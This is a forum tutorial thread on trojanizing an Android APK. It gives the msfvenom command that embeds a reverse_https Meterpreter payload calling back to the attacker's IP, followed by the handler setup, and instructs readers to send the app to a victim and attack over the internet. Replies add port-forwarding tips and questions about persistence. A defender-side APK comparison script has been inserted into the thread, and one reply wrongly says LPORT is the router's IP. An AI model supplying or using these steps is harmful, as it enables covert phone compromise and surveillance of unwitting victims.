Forum Thread: Embedding Payload in an Innocent Looking .Apk File

Hello techies out there. Today we will be discussing how we can embed our payload in any apk file.

I don't know if a similar post has been published, but to my knowledge it hasn't! Actually there is a manual way published, but it's too time consuming!

Now this question is asked by many users. So instead of commenting on every one of them I decided to write this how-to. Since this is my first post, please be co-operative ;).

So, let's begin!

Step 1: Fire Up Your Kali

Now obviously this is the first step, so I don't need to explain this much!

Step 2: Creating and Embedding Payload

Write the following command in the terminal:

msfvenom -x "/path/to/the/apk/you/want/to/embed/the/payload/in" -p android/meterpreter/reverse_https LHOST=your_ip_address LPORT=your_port -o "your_output_apk_name"

Although you can use a payload of your own choice, I prefer "https" for Android because it provides a stable meterpreter session!

In case you get the following error:
"Error: zipalign not found. If it's not in your PATH, please add it."
Simply run this command in the terminal:
apt-get install zipalign

Step 3: Creating Meterpreter Session

Start console: msfconsole
Start handler: use exploit/multi/handler
Set payload: set payload android/meterpreter/reverse_https
Set LHOST: set LHOST your_ip
Set LPORT: set LPORT your_port
Exploit: exploit

Now, send the app to the victim's phone, let him install it and wait for the meterpreter session!
You can also perform this exploit over the internet by assigning your public IP while creating the payload!
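A defender-side check, added here and not part of the original post: the command above repackages an existing APK, which means the archive has to be re-signed and its classes.dex rebuilt. That leaves two reliable traces when the result is compared with a known-good copy of the same app build: the signature block under META-INF/ no longer matches the vendor's, and entries such as classes.dex and AndroidManifest.xml differ. The script below builds two stand-in APKs in memory (constructed sample data, not real app or Metasploit artefacts) and reports those differences. The string indicator list is an assumption: older Metasploit builds placed the stager under com.metasploit.stage, and newer builds may rename it, so treat it as a starting point rather than a complete signature.

```python
"""Added example: compare a suspect APK with a known-good copy of the same build.
A repackaged APK must be re-signed, so the v1 signature block under META-INF/
changes, and the injected code shows up as modified or added entries."""
import hashlib
import io
import zipfile

# ASSUMPTION: indicator strings seen in older Metasploit-injected dex files.
# Newer builds may rename the package, so this is a starting point only.
DEX_INDICATORS = [b"com/metasploit/stage", b"Lcom/metasploit/"]

# Signature block file suffixes used by JAR (v1) APK signing.
SIG_BLOCK_SUFFIXES = (".RSA", ".DSA", ".EC")


def _entries(apk_bytes):
    """Return {entry name: content bytes} for every file in the archive."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        return {info.filename: zf.read(info) for info in zf.infolist()}


def signer_fingerprint(entries):
    """SHA-256 over the v1 signature block(s). For the same build the vendor's
    copy is byte-identical here; a repackaged copy has to be re-signed, so it
    differs. For cross-version checks compare the certificate itself instead
    (e.g. `apksigner verify --print-certs`)."""
    h = hashlib.sha256()
    for name in sorted(entries):
        if name.startswith("META-INF/") and name.upper().endswith(SIG_BLOCK_SUFFIXES):
            h.update(name.encode())
            h.update(entries[name])
    return h.hexdigest()


def compare_apks(good_apk, suspect_apk):
    """Diff a suspect APK against a known-good one and flag repackaging traces."""
    good, bad = _entries(good_apk), _entries(suspect_apk)
    report = {
        "signer_changed": signer_fingerprint(good) != signer_fingerprint(bad),
        "added": sorted(set(bad) - set(good)),
        "removed": sorted(set(good) - set(bad)),
        # META-INF/ is excluded here because re-signing always rewrites it.
        "modified": sorted(n for n in set(good) & set(bad)
                           if not n.startswith("META-INF/") and good[n] != bad[n]),
        "indicator_hits": [],
    }
    for name, data in bad.items():
        if name.startswith("classes") and name.endswith(".dex"):
            for ind in DEX_INDICATORS:
                if ind in data:
                    report["indicator_hits"].append((name, ind.decode()))
    report["suspicious"] = bool(report["signer_changed"] or report["added"]
                                or report["modified"] or report["indicator_hits"])
    return report


def build_apk(files):
    """Constructed stand-in for an APK: a zip archive of {name: bytes}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in files.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed sample data. "dex\n035\0" is the real dex magic; the rest is filler.
GOOD_APK = build_apk({
    "AndroidManifest.xml": b'<manifest package="com.example.notes"/>',
    "classes.dex": b"dex\n035\x00" + b"Lcom/example/notes/MainActivity;",
    "res/layout/main.xml": b"<LinearLayout/>",
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    "META-INF/CERT.SF": b"Signature-Version: 1.0\n",
    "META-INF/CERT.RSA": b"<vendor signature block>",
})
SUSPECT_APK = build_apk({
    "AndroidManifest.xml": b'<manifest package="com.example.notes"/><uses-permission/>',
    "classes.dex": b"dex\n035\x00"
                   + b"Lcom/example/notes/MainActivity;Lcom/metasploit/stage/Payload;",
    "res/layout/main.xml": b"<LinearLayout/>",
    "META-INF/MANIFEST.MF": b"Manifest-Version: 1.0\n",
    "META-INF/CERT.SF": b"Signature-Version: 1.0\n",
    "META-INF/CERT.RSA": b"<different signature block>",
})

if __name__ == "__main__":
    for key, value in compare_apks(GOOD_APK, SUSPECT_APK).items():
        print(f"{key}: {value}")
```

In practice the "known-good" copy is the build you obtained from the vendor or app store; the signer comparison is the strongest signal because the attacker cannot reproduce the vendor's signing key, while the string indicators only catch unmodified Metasploit stagers.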

10 Responses

Can you explain this statement further: "You can also perform this exploit over the internet by assigning your public IP while creating the payload"?

It means that you can perform this attack over the internet/WAN by just assigning LHOST as your public IP address while creating and embedding the payload, as shown in Step 2.

When you are in a network using a router, your device will be assigned a private IP which is valid only inside your network. So your payload listener won't be able to listen to devices outside your network. Instead, if you use your public IP (your router's original IP) you can access the device remotely. You can get your public IP by googling "what is my ip".

For LPORT you set your router's IP address. Then just do port forwarding to your machine.

I just updated msfconsole and now all my payloads are not working; it says that my port is already open for another IP. So I killed that connection, but it's still not showing any result. Help me a bit, please.

  • Can we embed this type of payload (i.e., for Android) in an image file?
  • And how do I keep the connection active? It dies every 15 minutes.

It is taking too long to inject a payload into the apk.

I use reverse TCP; I find it more stable. Why should I use reverse HTTP? I am confused :|

apt-get install zipalign did not work in my Mac terminal. Please suggest a new method.

That's the command for the Linux terminal.
